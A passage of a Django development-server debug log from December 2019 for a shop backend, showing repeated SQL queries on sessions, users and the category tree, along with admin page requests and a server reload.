"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:47:13] "GET /api/v1/categories/ HTTP/1.0" 200 8596 DEBUG 2019-12-13 13:49:51,610 utils 19021 139703090349824 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:49:51.595772+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 49, 51, 595772, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:49:51,615 utils 19021 139703090349824 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:49:51,619 utils 19021 139703090349824 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 13:49:51,621 utils 19021 139703090349824 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 13:49:51,634 utils 19021 139703090349824 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 13:49:51,889 utils 19021 139703090349824 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:49:51.887226+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 49, 51, 887226, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:49:51] "GET /shop/category/ HTTP/1.0" 200 15719 DEBUG 2019-12-13 13:49:52,345 utils 19021 139703090349824 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:49:52.330835+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 49, 52, 330835, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:49:52,349 utils 19021 139703090349824 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:49:52] "GET /jsi18n/ HTTP/1.0" 200 3223 Not Found: /favicon.ico [13/Dec/2019 13:49:53] "GET /favicon.ico HTTP/1.0" 404 6629 /home/resfx/public_html/admin.resfx.com/backend/shopapi/serializers.py changed, reloading. Performing system checks... December 13, 2019 - 13:37:56 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace ?: (urls.W005) URL namespace 'rest_framework' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 2 issues (0 silenced). DEBUG 2019-12-13 13:49:54,863 utils 19639 139877879912192 (0.007) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-13 13:49:54,869 utils 19639 139877879912192 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-13 13:50:07,464 utils 19639 139877846468352 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:50:07.454613+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 50, 7, 454613, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:50:07,467 utils 19639 139877846468352 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:50:07,470 utils 19639 139877846468352 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 12; args=(12,) DEBUG 2019-12-13 13:50:07,502 utils 19639 139877846468352 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'category'); args=('shop', 'category') DEBUG 2019-12-13 13:50:07,564 utils 19639 139877846468352 (0.002) DECLARE "_django_curs_139877846468352_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:50:07,625 utils 19639 139877846468352 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:50:07.622682+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 50, 7, 622682, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:50:07] "GET /shop/category/12/change/ HTTP/1.0" 200 9674 DEBUG 2019-12-13 13:50:07,966 utils 19639 139877846468352 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:50:07.957104+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 50, 7, 957104, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:50:07,969 utils 19639 139877846468352 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:50:07] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:50:09,259 utils 19639 139877846468352 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:50:09.247167+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 13, 13, 50, 9, 247167, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-13 13:50:09,263 utils 19639 139877846468352 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:50:09,322 utils 19639 139877846468352 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-13 13:50:09,338 utils 19639 139877846468352 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:50:09.335239+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 50, 9, 335239, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [13/Dec/2019 13:50:09] "GET / HTTP/1.0" 200 8878 [13/Dec/2019 13:50:09] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [13/Dec/2019 13:50:09] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [13/Dec/2019 13:50:09] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [13/Dec/2019 13:50:09] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [13/Dec/2019 13:50:09] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [13/Dec/2019 13:50:09] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [13/Dec/2019 13:50:10] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [13/Dec/2019 13:50:10] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [13/Dec/2019 13:50:10] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 DEBUG 2019-12-13 13:50:17,715 utils 19639 139877756696320 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:50:17,727 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:50:17,734 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:50:17,738 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:50:17,744 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:50:17,748 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:50:17,751 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:50:17,756 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:50:17,759 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:50:17,764 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:50:17,768 utils 19639 139877756696320 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:50:17,771 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:50:17,773 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:50:17,776 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:50:17,779 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:50:17,781 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:50:17,783 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:50:17,786 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:50:17,788 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:50:17,792 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:50:17,794 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:50:17,796 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:50:17,798 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:50:17,800 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:50:17,803 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:50:17,806 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:50:17,808 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:50:17,810 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:50:17,812 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:50:17,815 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:50:17,818 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:50:17,820 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:50:17,822 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:50:17,824 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:50:17,827 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:50:17,830 utils 19639 139877756696320 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) 